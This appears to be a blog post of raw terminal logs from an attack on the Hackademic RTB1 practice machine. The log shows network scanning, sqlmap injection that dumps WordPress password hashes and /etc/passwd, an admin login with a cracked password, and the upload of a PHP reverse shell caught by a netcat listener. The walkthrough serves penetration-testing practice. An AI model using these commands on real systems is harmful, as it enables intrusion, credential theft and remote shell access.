root@kali:~# netdiscover
Currently scanning: 192.168.65.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.56.1 08:00:27:00:e0:df 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:4d:e2:d8 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.104 00:0c:29:01:8a:4d 01 060 VMware, Inc.
root@kali:~# ifconfig eth0 192.168.56.101 netmask 255.255.255.0
root@kali:~# unicornscan 192.168.56.104
TCP open http[ 80] from 192.168.56.104 ttl 64
Main [Error chld.c:53] am i missing children?, oh well
root@kali:~# nmap -sS -sV -O 192.168.56.104 -pT:80
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-12 13:23 CET
Nmap scan report for 192.168.56.104
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.22 - 2.6.36 (98%), Linux 2.6.24 - 2.6.36 (95%), Linux 2.6.32 (95%), Linux 2.6.23 - 2.6.38 (94%), Linux 2.6.31 (94%), Linux 2.6.31 - 2.6.35 (94%), Linux 2.6.9 - 2.6.18 (94%), Linux 2.6.9 - 2.6.27 (94%), DirecTV HR34 DVR (Linux 2.6.22) (93%), Check Point VPN-1 UTM appliance (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.87 seconds
root@kali:~# nikto -host 192.168.56.104
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.56.104
+ Target Hostname: 192.168.56.104
+ Target Port: 80
+ Start Time: 2013-11-12 13:25:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ Server leaks inodes via ETags, header found with file /, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2013-11-12 13:25:26 (GMT1) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.56.104/
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Nov 12 13:25:50 2013
URL_BASE: http://192.168.56.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.104/ ----
+ http://192.168.56.104/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.56.104/index.html (CODE:200|SIZE:1475)
+ http://192.168.56.104/phpMyAdmin (CODE:403|SIZE:292)
+ http://192.168.56.104/phpmyadmin (CODE:403|SIZE:292)
-----------------
DOWNLOADED: 4592 - FOUND: 4
Iceweasel http://192.168.56.104
http://192.168.56.104/Hackademic_RTB1/
http://192.168.56.104/Hackademic_RTB1/?cat=1
sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1"
--dbs
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
sqlmap -u "http://192.168.56.104/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C ID,user_login,user_pass,user_level --dump
+----+---------------------------------------------+--------------+------------+
| ID | user_pass | user_login | user_level |
+----+---------------------------------------------+--------------+------------+
| 1 | 21232f297a57a5a743894a0e4a801fc3 (admin) | NickJames | 1 |
| 2 | b986448f0bb9e5e124ca91d3d650f52c | JohnSmith | 0 |
| 3 | 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3) | GeorgeMiller | 10 |
| 4 | a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack | 0 |
| 5 | 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell) | JasonKonnors | 0 |
| 6 | 50484c19f1afdaf3841a0d821ed393d2 (kernel) | MaxBucky | 0 |
+----+---------------------------------------------+--------------+------------+
--read-file "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bi
root@kali:/usr/share/dirb# dirb http://192.168.56.104//Hackademic_RTB1/
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Tue Nov 12 13:46:45 2013
URL_BASE: http://192.168.56.104//Hackademic_RTB1/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.104//Hackademic_RTB1/ ----
+ http://192.168.56.104//Hackademic_RTB1/index.php (CODE:500|SIZE:1881)
+ http://192.168.56.104//Hackademic_RTB1/wp-admin (CODE:301|SIZE:335)
+ http://192.168.56.104//Hackademic_RTB1/wp-content (CODE:301|SIZE:337)
+ http://192.168.56.104//Hackademic_RTB1/wp-images (CODE:301|SIZE:336)
+ http://192.168.56.104//Hackademic_RTB1/wp-includes (CODE:301|SIZE:338)
+ http://192.168.56.104//Hackademic_RTB1/xmlrpc.php (CODE:200|SIZE:42)
-----------------
DOWNLOADED: 4592 - FOUND: 6
root@kali:~# wpscan --url 192.168.56.104//Hackademic_RTB1
____________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| v2.1rNA
WordPress Security Scanner by the WPScan Team
Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________
| URL: http://192.168.56.104//Hackademic_RTB1/
| Started on Tue Nov 12 13:47:05 2013
[!] The WordPress 'http://192.168.56.104/Hackademic_RTB1/readme.html' file exists
[+] XML-RPC Interface available under /Hackademic_RTB1/xmlrpc.php
[+] WordPress version 1.5.1.1 identified from meta generator
[!] We have identified 4 vulnerabilities from the version number :
|
| * Title: WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit
| * Reference: http://www.exploit-db.com/exploits/1059/
|
| * Title: WordPress <= 1.5.1.1 SQL Injection Exploit
| * Reference: http://www.exploit-db.com/exploits/1033/
|
| * Title: XMLRPC Pingback API Internal/External Port Scanning
| * Reference: https://github.com/FireFart/WordpressPingbackPortScanner
|
| * Title: WordPress XMLRPC pingback additional issues
| * Reference: http://lab.onsec.ru/2013/01/wordpress-xmlrpc-pingback-additional.html
[+] The WordPress theme in use is starburst
| Name: starburst
| Location: http://192.168.56.104/Hackademic_RTB1/wp-content/themes/starburst/
[+] Enumerating plugins from passive detection ...
No plugins found :(
[+] Finished at Tue Nov 12 13:47:05 2013
[+] Elapsed time: 00:00:00
http://192.168.56.104/Hackademic_RTB1/wp-admin
username: GeorgeMiller password: q1w2e3
http://192.168.56.104/Hackademic_RTB1/wp-admin/options-misc.php?updated=true
Allow File Uploads
Allowed file extensions: jpg jpeg gif png php
http://192.168.56.104/Hackademic_RTB1/wp-admin/upload.php
File uploaded!
Your file phpreverse.php was uploaded successfully!
Here’s the code to display it:
a href='/Hackademic_RTB1/wp-content/phpreverse.php' title=''
Image Details:
Name: phpreverse.php
Size:5.37 KB
Type:application/x-php
root@kali:~# nc -l -v -p 1234
listening on [any] 1234 ...
192.168.56.104/Hackademic_RTB1/wp-content/phpreverse.php
192.168.56.104: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.104] 53071
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
16:13:10 up 1:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=489(apache) groups=489(apache)
sh: no job control in this shell
sh-4.0$ id
id
uid=48(apache) gid=489(apache) groups=489(apache)
sh-4.0$ pwd
pwd
/
Next phase: privilege escalation...
Nincsenek megjegyzések:
Megjegyzés küldése
Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.